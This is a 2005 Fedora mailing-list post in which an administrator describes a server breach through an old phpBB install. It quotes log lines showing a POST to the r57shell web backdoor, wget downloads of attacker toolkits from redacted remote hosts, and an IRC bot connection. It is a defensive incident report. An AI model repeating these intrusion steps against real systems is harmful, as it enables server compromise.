Hacked Server WAS: Strange connection

Tomas Larsson ktl at bornet.net
Wed Jul 20 14:48:21 UTC 2005 

> -----Original Message-----
> From: fedora-list-bounces at redhat.com 
> [mailto:fedora-list-bounces at redhat.com] On Behalf Of Levent Duymus
> Sent: Wednesday, July 20, 2005 11:39 AM
> To: For users of Fedora Core releases
> Subject: Re: Strange connection
> 
> 
> also you should give much more detailed report about the suspicious 
> activity if exists.



Conclusion.
This is what I've found.
I'm not running awstats, so it's not responsible.
As it transpired phpBB must have been used. phpBB 2.0.8, "forgot" it was
there, it was only used for testing purposes, But someone found it.


Firstly I noticed that I had a strange connection when I ran "netstat  -a
-v -p -t"

It said that I was connected to 193.110.95.1:ircd,
"carouge.ch.eu.undernet.org"


In the httpd access log I found:

172.149.xxx.xxx - r57 [02/Jul/2005:16:05:10 +0200] "POST
/phpBB2/r57shell.php HTTP/1.1" 200 11581

This is a backdoor trojan.
It is not linked to any file, so it must been used by the hacker to gain
access to my server

In the httpd error logs I found this:

--21:34:47--  http://www.xxxx.ro/www/gulie.tgz
           => `gulie.tgz'
Slår upp www.xxxx.ro... 217.10.xxx.xxx       (Finding.....)
Ansluter till www.xxxxx.ro[217.10.xxx.xxx]:80... ansluten. (Connecting
to.......connected)
HTTP-begäran skickad, väntar på svar... 200 OK (HTTP request sent, waiting
for answer)
Längd: 229,187 [application/x-tar] (Length....)

    0K .......... .......... .......... .......... .......... 22%  119.67
KB/s
   50K .......... .......... .......... .......... .......... 44%  279.43
KB/s
  100K .......... .......... .......... .......... .......... 67%  358.69
KB/s
  150K .......... .......... .......... .......... .......... 89%  304.26
KB/s
  200K .......... .......... ...                             100%  406.82
KB/s

21:34:48 (233.38 KB/s) - "gulie.tgz" sparad [229187/229187]

Warning: bad syntax, perhaps a bogus '-'? See
http://procps.sf.net/faq.html
Warning: bad syntax, perhaps a bogus '-'? See
http://procps.sf.net/faq.html

This one was responsible for the connection to 193.110.95.1:ircd,
"carouge.ch.eu.undernet.org"
It was located in /var/tmp


I also found this in the error-logs
--16:02:53--  http://www.yyyy.us/cycomm.tar.gz
           => `cycomm.tar.gz'
Slår upp www.yyyy.us... 69.9.yyy.yy
Ansluter till www.yyyy.us[69.9.yyy.yyy]:80... ansluten.
HTTP-begäran skickad, väntar på svar... 200 OK
Längd: 8,179 [application/x-tar]

    0K .......                                               100%   53.66
KB/s

16:02:55 (53.66 KB/s) - "cycomm.tar.gz" sparad [8179/8179]

--16:02:55--  http://www.yyyy.us/cycomm.tar.gz
           => `cycomm.tar.gz'
Slår upp www.yyyy.us... 69.9.yyy.yy
Ansluter till www.yyyy.us[69.9.yyy.yy]:80... ansluten.
HTTP-begäran skickad, väntar på svar... 200 OK
Längd: 8,179 [application/x-tar]

    0K .......                                               100%   49.24
KB/s

16:02:56 (49.24 KB/s) - "cycomm.tar.gz" sparad [8179/8179]

bind: Address already in use
--16:03:36--  http://www.yyyy.us/roots.tar
           => `roots.tar'
Slår upp www.yyyy.us... 69.9.yyy.yyy
Ansluter till www.yyyy.us[69.9.yyy.yyy]:80... ansluten.
HTTP-begäran skickad, väntar på svar... 200 OK
Längd: 30,720 [application/x-tar]

    0K .......... .......... ..........                      100%   75.51
KB/s

16:03:37 (75.51 KB/s) - "roots.tar" sparad [30720/30720]

--16:03:37--  http://www.yyyy.us/roots.tar
           => `roots.tar'
Slår upp www.yyyy.us... 69.9.yyy.yyy
Ansluter till www.yyyy.us[69.9.yyy.yyy]:80... ansluten.
HTTP-begäran skickad, väntar på svar... 200 OK
Längd: 30,720 [application/x-tar]

    0K .......... .......... ..........                      100%   68.40
KB/s

16:03:38 (68.40 KB/s) - "roots.tar" sparad [30720/30720]

error: 'kern.ostype' is an unknown key
error: 'kern.osrelease' is an unknown key
error: 'kern.ostype' is an unknown key
error: 'kern.osrelease' is an unknown key
error: 'kern.ostype' is an unknown key
error: 'kern.osrelease' is an unknown key
error: 'kern.ostype' is an unknown key
error: 'kern.osrelease' is an unknown key
Cant open port
Warning: bad syntax, perhaps a bogus '-'? See
http://procps.sf.net/faq.html
error: 'kern.ostype' is an unknown key
error: 'kern.osrelease' is an unknown key

These last ones has left no trace on the hd's at all.

Anyway, backed up the serve for now, reinstal in the near future I think,
need to download the latest cor though.

With best regards

Tomas Larsson
Sweden

Verus Amicus Est Tamquam Alter Idem
-------------- next part --------------
A non-text attachment was scrubbed...
Name: smime.p7s
Type: application/x-pkcs7-signature
Size: 3018 bytes
Desc: not available
URL: <http://listman.redhat.com/archives/fedora-list/attachments/20050720/0eda9f2e/attachment-0001.bin>

More information about the fedora-list mailing list